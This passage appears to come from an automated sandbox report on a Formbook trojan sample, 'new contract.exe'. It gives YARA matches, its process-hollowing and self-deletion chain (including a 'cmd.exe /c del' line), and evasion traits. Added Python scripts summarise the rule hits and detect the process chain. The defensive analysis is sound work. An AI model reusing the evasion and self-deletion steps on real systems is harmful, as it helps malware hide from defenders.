          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_02DBE5CD, 5_2_02DBE5CD
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_02DB2D02, 5_2_02DB2D02
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: String function: 03197E54 appears 99 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: String function: 031CF290 appears 103 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: String function: 031BEA12 appears 86 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: String function: 03185130 appears 58 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: String function: 0313B970 appears 262 times
          Source: C:\Users\user\Desktop\new contract.exe | Code function: String function: 01677E54 appears 107 times
          Source: C:\Users\user\Desktop\new contract.exe | Code function: String function: 016AF290 appears 103 times
          Source: C:\Users\user\Desktop\new contract.exe | Code function: String function: 01665130 appears 58 times
          Source: C:\Users\user\Desktop\new contract.exe | Code function: String function: 0161B970 appears 262 times
          Source: C:\Users\user\Desktop\new contract.exe | Code function: String function: 0169EA12 appears 86 times
          Source: new contract.exe, 00000000.00000002.1740008298.000000000126E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs new contract.exe
          Source: new contract.exe, 00000000.00000002.1744485602.0000000008E80000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs new contract.exe
          Source: new contract.exe, 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs new contract.exe
          Source: new contract.exe, 00000002.00000002.1806754751.000000000119E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamenetstat.exej% vs new contract.exe
          Source: new contract.exe, 00000002.00000002.1806931076.000000000171D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs new contract.exe
          Source: new contract.exe, 00000002.00000002.1806662425.0000000001130000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamenetstat.exej% vs new contract.exe
          Source: new contract.exe | Binary or memory string: OriginalFilenameQTW.exe6 vs new contract.exe
          Source: new contract.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4142928612.000000000E4FB000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: new contract.exe PID: 7424, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: new contract.exe PID: 7648, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: NETSTAT.EXE PID: 7732, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
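The YARA rows above repeat the same four rules across unpacked PEs, memory dumps and process memory. The following script collapses them into one record per rule (sources that hit it, the scan kinds involved, and the rule metadata so the fingerprint and id can be checked against the rule repository). It is an added example and not part of the Joe Sandbox report; the sample rows are copied from this report, and the regex that tolerates the source/detail cell boundary being either fused ("UNPACKEDPEMatched rule:") or separated by " | " is an assumption about how the report text was extracted.

```python
"""Collapse per-source YARA hit rows from a Joe Sandbox report into one record
per rule. Added example, not part of Joe Sandbox; the rows below are copied
from this report, the cell-boundary handling in HIT_RE is an assumption."""
import re

# Source cell, then "type: KIND", then the detail cell "Matched rule: NAME meta..."
HIT_RE = re.compile(
    r"^Source:\s*(?P<source>.+?),\s*type:\s*(?P<kind>[A-Z]+?)\s*\|?\s*"
    r"Matched rule:\s*(?P<rule>\S+)\s*(?P<meta>.*)$"
)

# Five rows copied from the report (one fused, one with a " | " boundary).
SAMPLE_ROWS = """
Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.4142928612.000000000E4FB000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: Process Memory Space: NETSTAT.EXE PID: 7732, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
""".strip().splitlines()


def parse_hit(row):
    """One report row -> dict with source, kind, rule and metadata, or None
    when the row is not a YARA hit (e.g. a 'Static PE information' row)."""
    m = HIT_RE.match(row.strip())
    if not m:
        return None
    meta, last = {}, None
    for item in m["meta"].split(", "):
        if " = " in item:
            last, value = item.split(" = ", 1)
            meta[last] = value
        elif last is not None:
            # comma inside a value, e.g. "scan_context = file, memory"
            meta[last] += ", " + item
    return {"source": m["source"], "kind": m["kind"], "rule": m["rule"], "meta": meta}


def summarize(rows):
    """rule name -> sources that matched, scan kinds involved, rule metadata.
    Metadata is taken from the first row for the rule; it is identical across rows."""
    summary = {}
    for row in rows:
        hit = parse_hit(row)
        if hit is None:
            continue
        entry = summary.setdefault(
            hit["rule"], {"sources": [], "kinds": set(), "meta": hit["meta"]})
        entry["sources"].append(hit["source"])
        entry["kinds"].add(hit["kind"])
    return summary


if __name__ == "__main__":
    for rule, entry in summarize(SAMPLE_ROWS).items():
        print(rule, sorted(entry["kinds"]), len(entry["sources"]), "source(s)",
              "fingerprint:", entry["meta"].get("fingerprint", "n/a"))
```

Run over the full section this gives four rules; the two Elastic rules carry a fingerprint and id that identify the exact rule revision, which is what you want in a triage note rather than the 25 raw rows.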
Source: new contract.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, fgEBeMUyhH7sZUUckO.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BOAIWHfAjJUfow6tuk.cs | Security API names: _0020.SetAccessControl
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BOAIWHfAjJUfow6tuk.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BOAIWHfAjJUfow6tuk.cs | Security API names: _0020.AddAccessRule
Source: 0.2.new contract.exe.419def0.2.raw.unpack, BOAIWHfAjJUfow6tuk.cs | Security API names: _0020.SetAccessControl
Source: 0.2.new contract.exe.419def0.2.raw.unpack, BOAIWHfAjJUfow6tuk.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.new contract.exe.419def0.2.raw.unpack, BOAIWHfAjJUfow6tuk.cs | Security API names: _0020.AddAccessRule
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BOAIWHfAjJUfow6tuk.cs | Security API names: _0020.SetAccessControl
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BOAIWHfAjJUfow6tuk.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BOAIWHfAjJUfow6tuk.cs | Security API names: _0020.AddAccessRule
Source: 0.2.new contract.exe.419def0.2.raw.unpack, fgEBeMUyhH7sZUUckO.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, fgEBeMUyhH7sZUUckO.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.evad.winEXE@10/1@11/1
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_00681CFC GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle, 5_2_00681CFC
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_00681C89 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle, 5_2_00681C89
Source: C:\Users\user\Desktop\new contract.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\new contract.exe.log
Source: C:\Users\user\Desktop\new contract.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
Source: new contract.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\new contract.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: new contract.exe | ReversingLabs: Detection: 50%
Source: unknown | Process created: C:\Users\user\Desktop\new contract.exe "C:\Users\user\Desktop\new contract.exe"
Source: C:\Users\user\Desktop\new contract.exe | Process created: C:\Users\user\Desktop\new contract.exe "C:\Users\user\Desktop\new contract.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autofmt.exe "C:\Windows\SysWOW64\autofmt.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\new contract.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
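The "Process created" rows above form the chain that makes this sample recognisable in endpoint telemetry: the sample re-launches its own image (the hollowing target), explorer.exe starts 32-bit system tools from SysWOW64 with no arguments, and one of them runs cmd.exe /c del against the original file. The following detection logic is an added example and not part of the Joe Sandbox report. It runs over constructed Sysmon-style process-creation records: PIDs 7424, 7648 and 7732 are the report's, while every other PID, the explorer.exe entry, the benign notepad.exe row and the benign user-run del are assumed.

```python
"""Three process-tree signals for the chain seen in this report, over
constructed events. Added example, not part of Joe Sandbox; PIDs other than
7424, 7648 and 7732, the explorer.exe row and the two benign rows are assumed."""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # command line as logged


EVENTS = [
    ProcEvent(7424, 4000, r"C:\Users\user\Desktop\new contract.exe",
              r'"C:\Users\user\Desktop\new contract.exe"'),
    ProcEvent(7648, 7424, r"C:\Users\user\Desktop\new contract.exe",
              r'"C:\Users\user\Desktop\new contract.exe"'),
    ProcEvent(3500, 1, r"C:\Windows\explorer.exe", "explorer.exe"),          # assumed PIDs
    ProcEvent(7700, 3500, r"C:\Windows\SysWOW64\autofmt.exe",
              r'"C:\Windows\SysWOW64\autofmt.exe"'),
    ProcEvent(7732, 3500, r"C:\Windows\SysWOW64\NETSTAT.EXE",
              r'"C:\Windows\SysWOW64\NETSTAT.EXE"'),
    ProcEvent(7780, 7732, r"C:\Windows\SysWOW64\cmd.exe",
              r'cmd.exe /c del "C:\Users\user\Desktop\new contract.exe"'),
    ProcEvent(7796, 7780, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    # Constructed benign noise: neither row should trip a rule.
    ProcEvent(8000, 3500, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcEvent(8100, 3500, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c del "C:\Users\user\Desktop\notes.txt"'),
]

SYSWOW64 = r"c:\windows\syswow64"
DEL_RE = re.compile(r'/c\s+del\s+"?(?P<target>[^"]+)"?', re.IGNORECASE)


def _by_pid(events):
    return {e.pid: e for e in events}


def self_spawn(events):
    """Child whose image equals its parent's image: how this sample sets up
    process hollowing (new contract.exe -> new contract.exe)."""
    procs = _by_pid(events)
    return [e.pid for e in events
            if e.ppid in procs and procs[e.ppid].image.lower() == e.image.lower()]


def explorer_spawns_wow64_tool(events):
    """explorer.exe launching a SysWOW64 utility with an empty command line.
    Users do not start autofmt.exe or NETSTAT.EXE that way; injected code in
    explorer.exe does."""
    procs = _by_pid(events)
    hits = []
    for e in events:
        parent = procs.get(e.ppid)
        if (parent is not None
                and ntpath.basename(parent.image).lower() == "explorer.exe"
                and ntpath.dirname(e.image).lower() == SYSWOW64
                and e.cmdline.strip().strip('"').lower() == e.image.lower()):
            hits.append(e.pid)
    return hits


def self_delete(events):
    """cmd.exe /c del whose target is the image of a process already in the
    tree: the dropper being erased after execution moved elsewhere."""
    images = {e.image.lower() for e in events}
    hits = []
    for e in events:
        if ntpath.basename(e.image).lower() != "cmd.exe":
            continue
        m = DEL_RE.search(e.cmdline)
        if m and m["target"].strip().lower() in images:
            hits.append(e.pid)
    return hits


def triage(events):
    """All three signals together; the chain in this report trips every one."""
    return {
        "self_spawn": self_spawn(events),
        "explorer_to_wow64_tool": explorer_spawns_wow64_tool(events),
        "self_delete": self_delete(events),
    }


if __name__ == "__main__":
    print(triage(EVENTS))
```

The self-spawn rule on its own is noisy (browsers and installers do the same), so alert on it only together with one of the other two; the explorer-to-SysWOW64 rule and the self-delete rule each have low false-positive rates on their own.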
Source: C:\Users\user\Desktop\new contract.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\new contract.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\new contract.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\new contract.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\new contract.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\new contract.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\new contract.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\new contract.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\new contract.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\new contract.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\new contract.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\new contract.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\new contract.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\new contract.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\new contract.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\new contract.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\new contract.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\new contract.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\new contract.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\new contract.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\new contract.exe | Section loaded: iconcodecservice.dll
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: snmpapi.dll
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\new contract.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\new contract.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: new contract.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: new contract.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: netstat.pdbGCTL source: new contract.exe, 00000002.00000002.1806754751.000000000119E000.00000004.00000020.00020000.00000000.sdmp, new contract.exe, 00000002.00000002.1806662425.0000000001130000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: netstat.pdb source: new contract.exe, 00000002.00000002.1806754751.000000000119E000.00000004.00000020.00020000.00000000.sdmp, new contract.exe, 00000002.00000002.1806662425.0000000001130000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: new contract.exe, 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.1808242227.0000000002F63000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.1806702400.0000000002DB3000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: new contract.exe, new contract.exe, 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000005.00000003.1808242227.0000000002F63000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.1806702400.0000000002DB3000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp

          Data Obfuscation

Source: 0.2.new contract.exe.419def0.2.raw.unpack, BOAIWHfAjJUfow6tuk.cs | .Net Code: U3QVC8bZLu System.Reflection.Assembly.Load(byte[])
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BOAIWHfAjJUfow6tuk.cs | .Net Code: U3QVC8bZLu System.Reflection.Assembly.Load(byte[])
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BOAIWHfAjJUfow6tuk.cs | .Net Code: U3QVC8bZLu System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0041703B push ebx; retf 2_2_0041703C
